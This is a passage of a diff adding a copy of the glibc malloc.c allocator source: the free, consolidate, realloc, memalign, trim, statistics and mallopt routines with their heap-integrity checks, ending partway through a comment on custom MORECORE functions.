+	    tcache_put (p, tc_idx);
+	    return;
+	  }
+      }
+  }
+#endif
+
+  /*
+    If eligible, place chunk on a fastbin so it can be found
+    and used quickly in malloc.
+  */
+
+  if ((unsigned long)(size) <= (unsigned long)(get_max_fast ())
+
+#if TRIM_FASTBINS
+      /*
+	If TRIM_FASTBINS set, don't place chunks
+	bordering top into fastbins
+      */
+      && (chunk_at_offset(p, size) != av->top)
+#endif
+      ) {
+
+    if (__builtin_expect (chunksize_nomask (chunk_at_offset (p, size))
+			  <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (chunksize (chunk_at_offset (p, size))
+			     >= av->system_mem, 0))
+      {
+	bool fail = true;
+	/* We might not have a lock at this point and concurrent modifications
+	   of system_mem might result in a false positive.  Redo the test after
+	   getting the lock.  */
+	if (!have_lock)
+	  {
+	    __libc_lock_lock (av->mutex);
+	    fail = (chunksize_nomask (chunk_at_offset (p, size)) <= 2 * SIZE_SZ
+		    || chunksize (chunk_at_offset (p, size)) >= av->system_mem);
+	    __libc_lock_unlock (av->mutex);
+	  }
+
+	if (fail)
+	  malloc_printerr ("free(): invalid next size (fast)");
+      }
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    atomic_store_relaxed (&av->have_fastchunks, true);
+    unsigned int idx = fastbin_index(size);
+    fb = &fastbin (av, idx);
+
+    /* Atomically link P to its fastbin: P->FD = *FB; *FB = P;  */
+    mchunkptr old = *fb, old2;
+
+    if (SINGLE_THREAD_P)
+      {
+	/* Check that the top of the bin is not the record we are going to
+	   add (i.e., double free).  */
+	if (__builtin_expect (old == p, 0))
+	  malloc_printerr ("double free or corruption (fasttop)");
+	p->fd = old;
+	*fb = p;
+      }
+    else
+      do
+	{
+	  /* Check that the top of the bin is not the record we are going to
+	     add (i.e., double free).  */
+	  if (__builtin_expect (old == p, 0))
+	    malloc_printerr ("double free or corruption (fasttop)");
+	  p->fd = old2 = old;
+	}
+      while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2))
+	     != old2);
+
+    /* Check that size of fastbin chunk at the top is the same as
+       size of the chunk that we are adding.  We can dereference OLD
+       only if we have the lock, otherwise it might have already been
+       allocated again.  */
+    if (have_lock && old != NULL
+	&& __builtin_expect (fastbin_index (chunksize (old)) != idx, 0))
+      malloc_printerr ("invalid fastbin entry (free)");
+  }
+
+  /*
+    Consolidate other non-mmapped chunks as they arrive.
+  */
+
+  else if (!chunk_is_mmapped(p)) {
+
+    /* If we're single-threaded, don't lock the arena.  */
+    if (SINGLE_THREAD_P)
+      have_lock = true;
+
+    if (!have_lock)
+      __libc_lock_lock (av->mutex);
+
+    nextchunk = chunk_at_offset(p, size);
+
+    /* Lightweight tests: check whether the block is already the
+       top block.  */
+    if (__glibc_unlikely (p == av->top))
+      malloc_printerr ("double free or corruption (top)");
+    /* Or whether the next chunk is beyond the boundaries of the arena.  */
+    if (__builtin_expect (contiguous (av)
+			  && (char *) nextchunk
+			  >= ((char *) av->top + chunksize(av->top)), 0))
+	malloc_printerr ("double free or corruption (out)");
+    /* Or whether the block is actually not marked used.  */
+    if (__glibc_unlikely (!prev_inuse(nextchunk)))
+      malloc_printerr ("double free or corruption (!prev)");
+
+    nextsize = chunksize(nextchunk);
+    if (__builtin_expect (chunksize_nomask (nextchunk) <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (nextsize >= av->system_mem, 0))
+      malloc_printerr ("free(): invalid next size (normal)");
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    /* consolidate backward */
+    if (!prev_inuse(p)) {
+      prevsize = prev_size (p);
+      size += prevsize;
+      p = chunk_at_offset(p, -((long) prevsize));
+      if (__glibc_unlikely (chunksize(p) != prevsize))
+        malloc_printerr ("corrupted size vs. prev_size while consolidating");
+      unlink_chunk (av, p);
+    }
+
+    if (nextchunk != av->top) {
+      /* get and clear inuse bit */
+      nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+      /* consolidate forward */
+      if (!nextinuse) {
+	unlink_chunk (av, nextchunk);
+	size += nextsize;
+      } else
+	clear_inuse_bit_at_offset(nextchunk, 0);
+
+      /*
+	Place the chunk in unsorted chunk list. Chunks are
+	not placed into regular bins until after they have
+	been given one chance to be used in malloc.
+      */
+
+      bck = unsorted_chunks(av);
+      fwd = bck->fd;
+      if (__glibc_unlikely (fwd->bk != bck))
+	malloc_printerr ("free(): corrupted unsorted chunks");
+      p->fd = fwd;
+      p->bk = bck;
+      if (!in_smallbin_range(size))
+	{
+	  p->fd_nextsize = NULL;
+	  p->bk_nextsize = NULL;
+	}
+      bck->fd = p;
+      fwd->bk = p;
+
+      set_head(p, size | PREV_INUSE);
+      set_foot(p, size);
+
+      check_free_chunk(av, p);
+    }
+
+    /*
+      If the chunk borders the current high end of memory,
+      consolidate into top
+    */
+
+    else {
+      size += nextsize;
+      set_head(p, size | PREV_INUSE);
+      av->top = p;
+      check_chunk(av, p);
+    }
+
+    /*
+      If freeing a large space, consolidate possibly-surrounding
+      chunks. Then, if the total unused topmost memory exceeds trim
+      threshold, ask malloc_trim to reduce top.
+
+      Unless max_fast is 0, we don't know if there are fastbins
+      bordering top, so we cannot tell for sure whether threshold
+      has been reached unless fastbins are consolidated.  But we
+      don't want to consolidate on each free.  As a compromise,
+      consolidation is performed if FASTBIN_CONSOLIDATION_THRESHOLD
+      is reached.
+    */
+
+    if ((unsigned long)(size) >= FASTBIN_CONSOLIDATION_THRESHOLD) {
+      if (atomic_load_relaxed (&av->have_fastchunks))
+	malloc_consolidate(av);
+
+      if (av == &main_arena) {
+#ifndef MORECORE_CANNOT_TRIM
+	if ((unsigned long)(chunksize(av->top)) >=
+	    (unsigned long)(mp_.trim_threshold))
+	  systrim(mp_.top_pad, av);
+#endif
+      } else {
+	/* Always try heap_trim(), even if the top chunk is not
+	   large, because the corresponding heap might go away.  */
+	heap_info *heap = heap_for_ptr(top(av));
+
+	assert(heap->ar_ptr == av);
+	heap_trim(heap, mp_.top_pad);
+      }
+    }
+
+    if (!have_lock)
+      __libc_lock_unlock (av->mutex);
+  }
+  /*
+    If the chunk was allocated via mmap, release via munmap().
+  */
+
+  else {
+    munmap_chunk (p);
+  }
+}
+
+/*
+  ------------------------- malloc_consolidate -------------------------
+
+  malloc_consolidate is a specialized version of free() that tears
+  down chunks held in fastbins.  Free itself cannot be used for this
+  purpose since, among other things, it might place chunks back onto
+  fastbins.  So, instead, we need to use a minor variant of the same
+  code.
+*/
+
+static void malloc_consolidate(mstate av)
+{
+  mfastbinptr*    fb;                 /* current fastbin being consolidated */
+  mfastbinptr*    maxfb;              /* last fastbin (for loop control) */
+  mchunkptr       p;                  /* current chunk being consolidated */
+  mchunkptr       nextp;              /* next chunk to consolidate */
+  mchunkptr       unsorted_bin;       /* bin header */
+  mchunkptr       first_unsorted;     /* chunk to link to */
+
+  /* These have same use as in free() */
+  mchunkptr       nextchunk;
+  INTERNAL_SIZE_T size;
+  INTERNAL_SIZE_T nextsize;
+  INTERNAL_SIZE_T prevsize;
+  int             nextinuse;
+
+  atomic_store_relaxed (&av->have_fastchunks, false);
+
+  unsorted_bin = unsorted_chunks(av);
+
+  /*
+    Remove each chunk from fast bin and consolidate it, placing it
+    then in unsorted bin. Among other reasons for doing this,
+    placing in unsorted bin avoids needing to calculate actual bins
+    until malloc is sure that chunks aren't immediately going to be
+    reused anyway.
+  */
+
+  maxfb = &fastbin (av, NFASTBINS - 1);
+  fb = &fastbin (av, 0);
+  do {
+    p = atomic_exchange_acq (fb, NULL);
+    if (p != 0) {
+      do {
+	{
+	  unsigned int idx = fastbin_index (chunksize (p));
+	  if ((&fastbin (av, idx)) != fb)
+	    malloc_printerr ("malloc_consolidate(): invalid chunk size");
+	}
+
+	check_inuse_chunk(av, p);
+	nextp = p->fd;
+
+	/* Slightly streamlined version of consolidation code in free() */
+	size = chunksize (p);
+	nextchunk = chunk_at_offset(p, size);
+	nextsize = chunksize(nextchunk);
+
+	if (!prev_inuse(p)) {
+	  prevsize = prev_size (p);
+	  size += prevsize;
+	  p = chunk_at_offset(p, -((long) prevsize));
+	  if (__glibc_unlikely (chunksize(p) != prevsize))
+	    malloc_printerr ("corrupted size vs. prev_size in fastbins");
+	  unlink_chunk (av, p);
+	}
+
+	if (nextchunk != av->top) {
+	  nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+	  if (!nextinuse) {
+	    size += nextsize;
+	    unlink_chunk (av, nextchunk);
+	  } else
+	    clear_inuse_bit_at_offset(nextchunk, 0);
+
+	  first_unsorted = unsorted_bin->fd;
+	  unsorted_bin->fd = p;
+	  first_unsorted->bk = p;
+
+	  if (!in_smallbin_range (size)) {
+	    p->fd_nextsize = NULL;
+	    p->bk_nextsize = NULL;
+	  }
+
+	  set_head(p, size | PREV_INUSE);
+	  p->bk = unsorted_bin;
+	  p->fd = first_unsorted;
+	  set_foot(p, size);
+	}
+
+	else {
+	  size += nextsize;
+	  set_head(p, size | PREV_INUSE);
+	  av->top = p;
+	}
+
+      } while ( (p = nextp) != 0);
+
+    }
+  } while (fb++ != maxfb);
+}
+
+/*
+  ------------------------------ realloc ------------------------------
+*/
+
+void*
+_int_realloc(mstate av, mchunkptr oldp, INTERNAL_SIZE_T oldsize,
+	     INTERNAL_SIZE_T nb)
+{
+  mchunkptr        newp;            /* chunk to return */
+  INTERNAL_SIZE_T  newsize;         /* its size */
+  void*          newmem;          /* corresponding user mem */
+
+  mchunkptr        next;            /* next contiguous chunk after oldp */
+
+  mchunkptr        remainder;       /* extra space at end of newp */
+  unsigned long    remainder_size;  /* its size */
+
+  /* oldmem size */
+  if (__builtin_expect (chunksize_nomask (oldp) <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (oldsize >= av->system_mem, 0))
+    malloc_printerr ("realloc(): invalid old size");
+
+  check_inuse_chunk (av, oldp);
+
+  /* All callers already filter out mmap'ed chunks.  */
+  assert (!chunk_is_mmapped (oldp));
+
+  next = chunk_at_offset (oldp, oldsize);
+  INTERNAL_SIZE_T nextsize = chunksize (next);
+  if (__builtin_expect (chunksize_nomask (next) <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (nextsize >= av->system_mem, 0))
+    malloc_printerr ("realloc(): invalid next size");
+
+  if ((unsigned long) (oldsize) >= (unsigned long) (nb))
+    {
+      /* already big enough; split below */
+      newp = oldp;
+      newsize = oldsize;
+    }
+
+  else
+    {
+      /* Try to expand forward into top */
+      if (next == av->top &&
+          (unsigned long) (newsize = oldsize + nextsize) >=
+          (unsigned long) (nb + MINSIZE))
+        {
+          set_head_size (oldp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+          av->top = chunk_at_offset (oldp, nb);
+          set_head (av->top, (newsize - nb) | PREV_INUSE);
+          check_inuse_chunk (av, oldp);
+          return chunk2mem (oldp);
+        }
+
+      /* Try to expand forward into next chunk;  split off remainder below */
+      else if (next != av->top &&
+               !inuse (next) &&
+               (unsigned long) (newsize = oldsize + nextsize) >=
+               (unsigned long) (nb))
+        {
+          newp = oldp;
+          unlink_chunk (av, next);
+        }
+
+      /* allocate, copy, free */
+      else
+        {
+          newmem = _int_malloc (av, nb - MALLOC_ALIGN_MASK);
+          if (newmem == 0)
+            return 0; /* propagate failure */
+
+          newp = mem2chunk (newmem);
+          newsize = chunksize (newp);
+
+          /*
+             Avoid copy if newp is next chunk after oldp.
+           */
+          if (newp == next)
+            {
+              newsize += oldsize;
+              newp = oldp;
+            }
+          else
+            {
+	      memcpy (newmem, chunk2mem (oldp), oldsize - SIZE_SZ);
+              _int_free (av, oldp, 1);
+              check_inuse_chunk (av, newp);
+              return chunk2mem (newp);
+            }
+        }
+    }
+
+  /* If possible, free extra space in old or extended chunk */
+
+  assert ((unsigned long) (newsize) >= (unsigned long) (nb));
+
+  remainder_size = newsize - nb;
+
+  if (remainder_size < MINSIZE)   /* not enough extra to split off */
+    {
+      set_head_size (newp, newsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+    }
+  else   /* split remainder */
+    {
+      remainder = chunk_at_offset (newp, nb);
+      set_head_size (newp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      /* Mark remainder as inuse so free() won't complain */
+      set_inuse_bit_at_offset (remainder, remainder_size);
+      _int_free (av, remainder, 1);
+    }
+
+  check_inuse_chunk (av, newp);
+  return chunk2mem (newp);
+}
+
+/*
+   ------------------------------ memalign ------------------------------
+ */
+
+static void *
+_int_memalign (mstate av, size_t alignment, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;             /* padded  request size */
+  char *m;                        /* memory returned by malloc call */
+  mchunkptr p;                    /* corresponding chunk */
+  char *brk;                      /* alignment point within p */
+  mchunkptr newp;                 /* chunk to return */
+  INTERNAL_SIZE_T newsize;        /* its size */
+  INTERNAL_SIZE_T leadsize;       /* leading space before alignment point */
+  mchunkptr remainder;            /* spare room at end to split off */
+  unsigned long remainder_size;   /* its size */
+  INTERNAL_SIZE_T size;
+
+
+
+  if (!checked_request2size (bytes, &nb))
+    {
+      __set_errno (ENOMEM);
+      return NULL;
+    }
+
+  /*
+     Strategy: find a spot within that chunk that meets the alignment
+     request, and then possibly free the leading and trailing space.
+   */
+
+  /* Call malloc with worst case padding to hit alignment. */
+
+  m = (char *) (_int_malloc (av, nb + alignment + MINSIZE));
+
+  if (m == 0)
+    return 0;           /* propagate failure */
+
+  p = mem2chunk (m);
+
+  if ((((unsigned long) (m)) % alignment) != 0)   /* misaligned */
+
+    { /*
+                Find an aligned spot inside chunk.  Since we need to give back
+                leading space in a chunk of at least MINSIZE, if the first
+                calculation places us at a spot with less than MINSIZE leader,
+                we can move to the next aligned spot -- we've allocated enough
+                total room so that this is always possible.
+                 */
+      brk = (char *) mem2chunk (((unsigned long) (m + alignment - 1)) &
+                                - ((signed long) alignment));
+      if ((unsigned long) (brk - (char *) (p)) < MINSIZE)
+        brk += alignment;
+
+      newp = (mchunkptr) brk;
+      leadsize = brk - (char *) (p);
+      newsize = chunksize (p) - leadsize;
+
+      /* For mmapped chunks, just adjust offset */
+      if (chunk_is_mmapped (p))
+        {
+          set_prev_size (newp, prev_size (p) + leadsize);
+          set_head (newp, newsize | IS_MMAPPED);
+          return chunk2mem (newp);
+        }
+
+      /* Otherwise, give back leader, use the rest */
+      set_head (newp, newsize | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+      set_head_size (p, leadsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      _int_free (av, p, 1);
+      p = newp;
+
+      assert (newsize >= nb &&
+              (((unsigned long) (chunk2mem (p))) % alignment) == 0);
+    }
+
+  /* Also give back spare room at the end */
+  if (!chunk_is_mmapped (p))
+    {
+      size = chunksize (p);
+      if ((unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (p, nb);
+          set_head (remainder, remainder_size | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head_size (p, nb);
+          _int_free (av, remainder, 1);
+        }
+    }
+
+  check_inuse_chunk (av, p);
+  return chunk2mem (p);
+}
+
+
+/*
+   ------------------------------ malloc_trim ------------------------------
+ */
+
+static int
+mtrim (mstate av, size_t pad)
+{
+  /* Ensure all blocks are consolidated.  */
+  malloc_consolidate (av);
+
+  const size_t ps = GLRO (dl_pagesize);
+  int psindex = bin_index (ps);
+  const size_t psm1 = ps - 1;
+
+  int result = 0;
+  for (int i = 1; i < NBINS; ++i)
+    if (i == 1 || i >= psindex)
+      {
+        mbinptr bin = bin_at (av, i);
+
+        for (mchunkptr p = last (bin); p != bin; p = p->bk)
+          {
+            INTERNAL_SIZE_T size = chunksize (p);
+
+            if (size > psm1 + sizeof (struct malloc_chunk))
+              {
+                /* See whether the chunk contains at least one unused page.  */
+                char *paligned_mem = (char *) (((uintptr_t) p
+                                                + sizeof (struct malloc_chunk)
+                                                + psm1) & ~psm1);
+
+                assert ((char *) chunk2mem (p) + 4 * SIZE_SZ <= paligned_mem);
+                assert ((char *) p + size > paligned_mem);
+
+                /* This is the size we could potentially free.  */
+                size -= paligned_mem - (char *) p;
+
+                if (size > psm1)
+                  {
+#if MALLOC_DEBUG
+                    /* When debugging we simulate destroying the memory
+                       content.  */
+                    memset (paligned_mem, 0x89, size & ~psm1);
+#endif
+                    __madvise (paligned_mem, size & ~psm1, MADV_DONTNEED);
+
+                    result = 1;
+                  }
+              }
+          }
+      }
+
+#ifndef MORECORE_CANNOT_TRIM
+  return result | (av == &main_arena ? systrim (pad, av) : 0);
+
+#else
+  return result;
+#endif
+}
+
+
+int
+__malloc_trim (size_t s)
+{
+  int result = 0;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      __libc_lock_lock (ar_ptr->mutex);
+      result |= mtrim (ar_ptr, s);
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return result;
+}
+
+
+/*
+   ------------------------- malloc_usable_size -------------------------
+ */
+
+static size_t
+musable (void *mem)
+{
+  mchunkptr p;
+  if (mem != 0)
+    {
+      p = mem2chunk (mem);
+
+      if (__builtin_expect (using_malloc_checking == 1, 0))
+        return malloc_check_get_size (p);
+
+      if (chunk_is_mmapped (p))
+	{
+	  if (DUMPED_MAIN_ARENA_CHUNK (p))
+	    return chunksize (p) - SIZE_SZ;
+	  else
+	    return chunksize (p) - 2 * SIZE_SZ;
+	}
+      else if (inuse (p))
+        return chunksize (p) - SIZE_SZ;
+    }
+  return 0;
+}
+
+
+size_t
+__malloc_usable_size (void *m)
+{
+  size_t result;
+
+  result = musable (m);
+  return result;
+}
+
+/*
+   ------------------------------ mallinfo ------------------------------
+   Accumulate malloc statistics for arena AV into M.
+ */
+
+static void
+int_mallinfo (mstate av, struct mallinfo *m)
+{
+  size_t i;
+  mbinptr b;
+  mchunkptr p;
+  INTERNAL_SIZE_T avail;
+  INTERNAL_SIZE_T fastavail;
+  int nblocks;
+  int nfastblocks;
+
+  check_malloc_state (av);
+
+  /* Account for top */
+  avail = chunksize (av->top);
+  nblocks = 1;  /* top always exists */
+
+  /* traverse fastbins */
+  nfastblocks = 0;
+  fastavail = 0;
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      for (p = fastbin (av, i); p != 0; p = p->fd)
+        {
+          ++nfastblocks;
+          fastavail += chunksize (p);
+        }
+    }
+
+  avail += fastavail;
+
+  /* traverse regular bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+      for (p = last (b); p != b; p = p->bk)
+        {
+          ++nblocks;
+          avail += chunksize (p);
+        }
+    }
+
+  m->smblks += nfastblocks;
+  m->ordblks += nblocks;
+  m->fordblks += avail;
+  m->uordblks += av->system_mem - avail;
+  m->arena += av->system_mem;
+  m->fsmblks += fastavail;
+  if (av == &main_arena)
+    {
+      m->hblks = mp_.n_mmaps;
+      m->hblkhd = mp_.mmapped_mem;
+      m->usmblks = 0;
+      m->keepcost = chunksize (av->top);
+    }
+}
+
+
+struct mallinfo
+__libc_mallinfo (void)
+{
+  struct mallinfo m;
+  mstate ar_ptr;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  memset (&m, 0, sizeof (m));
+  ar_ptr = &main_arena;
+  do
+    {
+      __libc_lock_lock (ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &m);
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return m;
+}
+
+/*
+   ------------------------------ malloc_stats ------------------------------
+ */
+
+void
+__malloc_stats (void)
+{
+  int i;
+  mstate ar_ptr;
+  unsigned int in_use_b = mp_.mmapped_mem, system_b = in_use_b;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  _IO_flockfile (stderr);
+  int old_flags2 = stderr->_flags2;
+  stderr->_flags2 |= _IO_FLAGS2_NOTCANCEL;
+  for (i = 0, ar_ptr = &main_arena;; i++)
+    {
+      struct mallinfo mi;
+
+      memset (&mi, 0, sizeof (mi));
+      __libc_lock_lock (ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &mi);
+      fprintf (stderr, "Arena %d:\n", i);
+      fprintf (stderr, "system bytes     = %10u\n", (unsigned int) mi.arena);
+      fprintf (stderr, "in use bytes     = %10u\n", (unsigned int) mi.uordblks);
+#if MALLOC_DEBUG > 1
+      if (i > 0)
+        dump_heap (heap_for_ptr (top (ar_ptr)));
+#endif
+      system_b += mi.arena;
+      in_use_b += mi.uordblks;
+      __libc_lock_unlock (ar_ptr->mutex);
+      ar_ptr = ar_ptr->next;
+      if (ar_ptr == &main_arena)
+        break;
+    }
+  fprintf (stderr, "Total (incl. mmap):\n");
+  fprintf (stderr, "system bytes     = %10u\n", system_b);
+  fprintf (stderr, "in use bytes     = %10u\n", in_use_b);
+  fprintf (stderr, "max mmap regions = %10u\n", (unsigned int) mp_.max_n_mmaps);
+  fprintf (stderr, "max mmap bytes   = %10lu\n",
+           (unsigned long) mp_.max_mmapped_mem);
+  stderr->_flags2 = old_flags2;
+  _IO_funlockfile (stderr);
+}
+
+
+/*
+   ------------------------------ mallopt ------------------------------
+ */
+static __always_inline int
+do_set_trim_threshold (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_trim_threshold, 3, value, mp_.trim_threshold,
+	      mp_.no_dyn_threshold);
+  mp_.trim_threshold = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static __always_inline int
+do_set_top_pad (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_top_pad, 3, value, mp_.top_pad,
+	      mp_.no_dyn_threshold);
+  mp_.top_pad = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static __always_inline int
+do_set_mmap_threshold (size_t value)
+{
+  /* Forbid setting the threshold too high.  */
+  if (value <= HEAP_MAX_SIZE / 2)
+    {
+      LIBC_PROBE (memory_mallopt_mmap_threshold, 3, value, mp_.mmap_threshold,
+		  mp_.no_dyn_threshold);
+      mp_.mmap_threshold = value;
+      mp_.no_dyn_threshold = 1;
+      return 1;
+    }
+  return 0;
+}
+
+static __always_inline int
+do_set_mmaps_max (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_mmap_max, 3, value, mp_.n_mmaps_max,
+	      mp_.no_dyn_threshold);
+  mp_.n_mmaps_max = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static __always_inline int
+do_set_mallopt_check (int32_t value)
+{
+  return 1;
+}
+
+static __always_inline int
+do_set_perturb_byte (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_perturb, 2, value, perturb_byte);
+  perturb_byte = value;
+  return 1;
+}
+
+static __always_inline int
+do_set_arena_test (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_arena_test, 2, value, mp_.arena_test);
+  mp_.arena_test = value;
+  return 1;
+}
+
+static __always_inline int
+do_set_arena_max (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_arena_max, 2, value, mp_.arena_max);
+  mp_.arena_max = value;
+  return 1;
+}
+
+#if USE_TCACHE
+static __always_inline int
+do_set_tcache_max (size_t value)
+{
+  if (value <= MAX_TCACHE_SIZE)
+    {
+      LIBC_PROBE (memory_tunable_tcache_max_bytes, 2, value, mp_.tcache_max_bytes);
+      mp_.tcache_max_bytes = value;
+      mp_.tcache_bins = csize2tidx (request2size(value)) + 1;
+      return 1;
+    }
+  return 0;
+}
+
+static __always_inline int
+do_set_tcache_count (size_t value)
+{
+  if (value <= MAX_TCACHE_COUNT)
+    {
+      LIBC_PROBE (memory_tunable_tcache_count, 2, value, mp_.tcache_count);
+      mp_.tcache_count = value;
+      return 1;
+    }
+  return 0;
+}
+
+static __always_inline int
+do_set_tcache_unsorted_limit (size_t value)
+{
+  LIBC_PROBE (memory_tunable_tcache_unsorted_limit, 2, value, mp_.tcache_unsorted_limit);
+  mp_.tcache_unsorted_limit = value;
+  return 1;
+}
+#endif
+
+static inline int
+__always_inline
+do_set_mxfast (size_t value)
+{
+  if (value <= MAX_FAST_SIZE)
+    {
+      LIBC_PROBE (memory_mallopt_mxfast, 2, value, get_max_fast ());
+      set_max_fast (value);
+      return 1;
+    }
+  return 0;
+}
+
+int
+__libc_mallopt (int param_number, int value)
+{
+  mstate av = &main_arena;
+  int res = 1;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  __libc_lock_lock (av->mutex);
+
+  LIBC_PROBE (memory_mallopt, 2, param_number, value);
+
+  /* We must consolidate main arena before changing max_fast
+     (see definition of set_max_fast).  */
+  malloc_consolidate (av);
+
+  /* Many of these helper functions take a size_t.  We do not worry
+     about overflow here, because negative int values will wrap to
+     very large size_t values and the helpers have sufficient range
+     checking for such conversions.  Many of these helpers are also
+     used by the tunables macros in arena.c.  */
+
+  switch (param_number)
+    {
+    case M_MXFAST:
+      res = do_set_mxfast (value);
+      break;
+
+    case M_TRIM_THRESHOLD:
+      res = do_set_trim_threshold (value);
+      break;
+
+    case M_TOP_PAD:
+      res = do_set_top_pad (value);
+      break;
+
+    case M_MMAP_THRESHOLD:
+      res = do_set_mmap_threshold (value);
+      break;
+
+    case M_MMAP_MAX:
+      res = do_set_mmaps_max (value);
+      break;
+
+    case M_CHECK_ACTION:
+      res = do_set_mallopt_check (value);
+      break;
+
+    case M_PERTURB:
+      res = do_set_perturb_byte (value);
+      break;
+
+    case M_ARENA_TEST:
+      if (value > 0)
+	res = do_set_arena_test (value);
+      break;
+
+    case M_ARENA_MAX:
+      if (value > 0)
+	res = do_set_arena_max (value);
+      break;
+    }
+  __libc_lock_unlock (av->mutex);
+  return res;
+}
+libc_hidden_def (__libc_mallopt)
+
+
+/*
+   -------------------- Alternative MORECORE functions --------------------
+ */
+
+
+/*
+   General Requirements for MORECORE.
+
+   The MORECORE function must have the following properties:
+
+   If MORECORE_CONTIGUOUS is false:
+
+ * MORECORE must allocate in multiples of pagesize. It will
+      only be called with arguments that are multiples of pagesize.
+
+ * MORECORE(0) must return an address that is at least
+      MALLOC_ALIGNMENT aligned. (Page-aligning always suffices.)
+
+   else (i.e. If MORECORE_CONTIGUOUS is true):
+
+ * Consecutive calls to MORECORE with positive arguments
+      return increasing addresses, indicating that space has been
+      contiguously extended.
+
+ * MORECORE need not allocate in multiples of pagesize.
+      Calls to MORECORE need not have args of multiples of pagesize.
+
+ * MORECORE need not page-align.
+
+   In either case:
+
+ * MORECORE may allocate more memory than requested. (Or even less,
+      but this will generally result in a malloc failure.)
+
+ * MORECORE must not allocate memory when given argument zero, but
+      instead return one past the end address of memory from previous
+      nonzero call. This malloc does NOT call MORECORE(0)
+      until at least one call with positive arguments is made, so
+      the initial value returned is not important.
+
+ * Even though consecutive calls to MORECORE need not return contiguous
+      addresses, it must be OK for malloc'ed chunks to span multiple
+      regions in those cases where they do happen to be contiguous.
+
+ * MORECORE need not handle negative arguments -- it may instead
+      just return MORECORE_FAILURE when given negative arguments.
+      Negative arguments are always multiples of pagesize. MORECORE
+      must not misinterpret negative args as large positive unsigned
+      args. You can suppress all such calls from even occurring by defining
+      MORECORE_CANNOT_TRIM,
+
+   There is some variation across systems about the type of the
+   argument to sbrk/MORECORE. If size_t is unsigned, then it cannot
+   actually be size_t, because sbrk supports negative args, so it is
+   normally the signed type of the same width as size_t (sometimes
+   declared as "intptr_t", and sometimes "ptrdiff_t").  It doesn't much
+   matter though. Internally, we use "long" as arguments, which should
+   work across all reasonable possibilities.
+
+   Additionally, if MORECORE ever returns failure for a positive
+   request, then mmap is used as a noncontiguous system allocator. This
+   is a useful backup strategy for systems with holes in address spaces
+   -- in this case sbrk cannot contiguously expand the heap, but mmap
+   may be able to map noncontiguous space.
+
+   If you'd like mmap to ALWAYS be used, you can define MORECORE to be
+   a function that always returns MORECORE_FAILURE.
+
+   If you are using this malloc with something other than sbrk (or its
+   emulation) to supply memory regions, you probably want to set
+   MORECORE_CONTIGUOUS as false.  As an example, here is a custom
+   allocator kindly contributed for pre-OSX macOS.  It uses virtually
+   but not necessarily physically contiguous non-paged memory (locked
+   in, present and won't get swapped out).  You can use it by
+   uncommenting this section, adding some #includes, and setting up the
+   appropriate defines above:
+
+ *#define MORECORE osMoreCore
+ *#define MORECORE_CONTIGUOUS 0
+
+   There is also a shutdown routine that should somehow be called for
+   cleanup upon program exit.
+
+ *#define MAX_POOL_ENTRIES 100
+ *#define MINIMUM_MORECORE_SIZE  (64 * 1024)
+   static int next_os_pool;
+   void *our_os_pools[MAX_POOL_ENTRIES];
+
+   void *osMoreCore(int size)
+   {
+    void *ptr = 0;
+    static void *sbrk_top = 0;
+
+    if (size > 0)
+    {
+      if (size < MINIMUM_MORECORE_SIZE)
+         size = MINIMUM_MORECORE_SIZE;
+      if (CurrentExecutionLevel() == kTaskLevel)
+         ptr = PoolAllocateResident(size + RM_PAGE_SIZE, 0);
+      if (ptr == 0)
+      {
+        return (void *) MORECORE_FAILURE;
+      }
+      // save ptrs so they can be freed during cleanup
+      our_os_pools[next_os_pool] = ptr;
+      next_os_pool++;
+      ptr = (void *) ((((unsigned long) ptr) + RM_PAGE_MASK) & ~RM_PAGE_MASK);
+      sbrk_top = (char *) ptr + size;
+      return ptr;
+    }
+    else if (size < 0)
+    {
+      // we don't currently support shrink behavior
+      return (void *) MORECORE_FAILURE;
+    }
+    else
+    {
+      return sbrk_top;
+    }
+   }
+
+   // cleanup any allocated memory pools
+   // called as last thing before shutting down driver
+
+   void osCleanupMem(void)
